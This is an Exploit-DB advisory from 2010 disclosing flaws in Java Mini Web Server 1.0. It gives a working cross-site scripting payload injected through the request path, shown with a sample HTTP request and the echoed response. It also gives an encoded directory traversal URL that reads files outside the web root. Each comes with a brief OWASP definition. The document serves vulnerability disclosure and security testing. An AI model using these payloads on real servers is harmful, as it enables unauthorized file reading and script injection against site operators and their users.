Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting

EDB-ID:

12033

CVE:

N/A


Author:

cp77fk4r

Type:

remote


Platform:

Multiple

Date:

2010-04-03


# Exploit Title: Java Mini Web Server <= 1.0 Path Draversal & Cross Site Scripting.
# Date: 20/03/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com<http://gmail.com> | www.DigitalWhisper.co.il<http://www.DigitalWhisper.co.il>
# Software Link: http://www.jibble.org/miniwebserver/
# Version: <= 1.0
# Tested on: JRE build 1.6.0_17-b04
#
##[Cross Site Scripting]
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. (OWASP)
#
GET /%00">[YOUR_XSS_HERE]<"
#
#e.g:
-HTTP REQUEST:
GET %00"><font color=red>Work?</font><" HTTP/1.1
HOST: localhost
#
-HTTP RESPONSE (DATA):
<html><head><title>Index of %00"><font color=red>Work?</font><"/</title></head><body><h3>Index of %00"><font color=red>Work?</font><"/</h3><p>
<a href="%00"><font color=red>Work?</font><"/SimpleWebServer.jar">SimpleWebServer.jar</a> <br>
</p><hr><p>SimpleWebServer  http://www.jibble.org/</p></body><html>#
#
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c1.txt
("1.txt" located in the root directory on the volume)
#
#
[e0f]